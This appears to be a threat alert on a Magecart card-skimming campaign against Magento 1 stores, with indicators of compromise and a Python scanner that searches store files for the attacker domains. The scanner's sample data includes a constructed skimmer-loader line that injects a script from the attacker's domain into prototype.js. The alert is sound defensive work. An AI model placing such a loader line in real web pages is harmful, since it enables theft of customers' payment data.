Malware Analysis – AZORult Info Stealer
September 15, 2020Rewterz Threat Alert – IcedID banking Trojan – IOCs
September 16, 2020
Severity
High
Analysis Summary
Almost two thousand Magento 1 stores across the world have been compromised in the largest documented Magecart campaign to date. It was a typical Magecart attack: malicious JavaScript injected into the store intercepts the payment details of unsuspecting customers at checkout. All inspected stores were running Magento version 1, which reached End-Of-Life in June 2020 and no longer receives security patches.
On the affected Magento 1 stores, a skimmer loader was appended to the file prototype.js, which is part of a standard Magento installation and is loaded on every page, so the injected code runs without any change to the store's templates.
The loader pulls //mcdnn.net/122002/assets/js/widget.js. That script serves dynamic content depending on the page it is included on: only when referenced from a checkout page does it return the malicious keystroke-logging code; on any other page it returns harmless content, so fetching the URL out of context will not reveal the skimmer.
The captured payment data is exfiltrated to a Moscow-hosted site at https://imags.pw/502.jsp, on the same network as the mcdnn.net domain.
Impact
- Steal customer payment card information
- Exposure of sensitive data
Indicators of Compromise
Domain Name
- mcdnn[.]net
- imags[.]pw
- mcdnn[.]me
- myicons[.]net
URL
- http[:]//mcdnn[.]net/122002/assets/js/widget[.]js
- https[:]//imags[.]pw/502[.]jsp
Remediation
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.
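Because widget.js only serves the skimmer to checkout pages, requesting it from an analyst's machine proves nothing; the reliable check is to search the store's document root for references to the indicators above, starting with the prototype.js file the loader was appended to. The script below is an added example, not Rewterz's tooling or part of Magento: it refangs the defanged indicators published in this alert, scans a directory tree of JavaScript and template files for them, and reports the file and line of every hit. The Magento 1 path js/prototype/prototype.js, the clean helper file and the injected loader line are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Defanged indicators exactly as published in the alert.
IOC_DOMAINS = ["mcdnn[.]net", "imags[.]pw", "mcdnn[.]me", "myicons[.]net"]
IOC_URLS = [
    "http[:]//mcdnn[.]net/122002/assets/js/widget[.]js",
    "https[:]//imags[.]pw/502[.]jsp",
]

# Constructed sample files: a stub of Magento 1's prototype.js with a loader
# appended (assumed location js/prototype/prototype.js) and one clean file.
SAMPLE_PROTOTYPE_JS = """/*  Prototype JavaScript framework (constructed stub for this example) */
var Prototype = { Version: '1.7' };
function $(id) { return document.getElementById(id); }
/* constructed injected loader appended at the end of the file */
var s=document.createElement('script');s.src='//mcdnn.net/122002/assets/js/widget.js';document.head.appendChild(s);
"""
SAMPLE_CLEAN_JS = "/* constructed clean helper */\nfunction noop() {}\n"


def refang(ioc: str) -> str:
    """Turn a defanged indicator (x[.]y, hxxp[:]//) back into a real string."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def ioc_pattern(domains, urls):
    """Build one case-insensitive regex for all indicators.

    URLs are matched without their scheme so the scheme-relative form used by
    the injected loader ("//mcdnn.net/...") is caught too, and they are listed
    before bare domains so the longer, more specific match wins.
    """
    url_alts = [re.escape(refang(u).split("://", 1)[-1]) for u in urls]
    dom_alts = [re.escape(refang(d)) for d in domains]
    return re.compile("|".join(url_alts + dom_alts), re.IGNORECASE)


def scan_text(text, pattern):
    """Return (line_number, matched_indicator) for every hit in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in pattern.finditer(line):
            hits.append((lineno, m.group(0).lower()))
    return hits


def scan_tree(root, pattern, suffixes=(".js", ".html", ".phtml", ".php")):
    """Walk a document root and map each file with hits to its hit list."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in suffixes:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        hits = scan_text(text, pattern)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def build_sample_tree(root):
    """Write the constructed sample files under root."""
    root = Path(root)
    (root / "js/prototype").mkdir(parents=True)
    (root / "js/prototype/prototype.js").write_text(SAMPLE_PROTOTYPE_JS)
    (root / "skin/frontend/base/default/js").mkdir(parents=True)
    (root / "skin/frontend/base/default/js/clean.js").write_text(SAMPLE_CLEAN_JS)


def demo():
    """Scan the constructed tree and return the findings dictionary."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root, ioc_pattern(IOC_DOMAINS, IOC_URLS))


if __name__ == "__main__":
    for filename, hits in demo().items():
        for lineno, ioc in hits:
            print(f"{filename}:{lineno}: {ioc}")
```

Run it against a real store by replacing the temporary directory with the document root and adding any further indicators to the two lists; a hit in prototype.js or any other core library file is a strong sign of injection, because Magento's own files never reference these hosts. Because the skimmer itself is served remotely and only at checkout, web-server access logs showing the checkout URL followed by requests to the listed hosts are the complementary signal to look for.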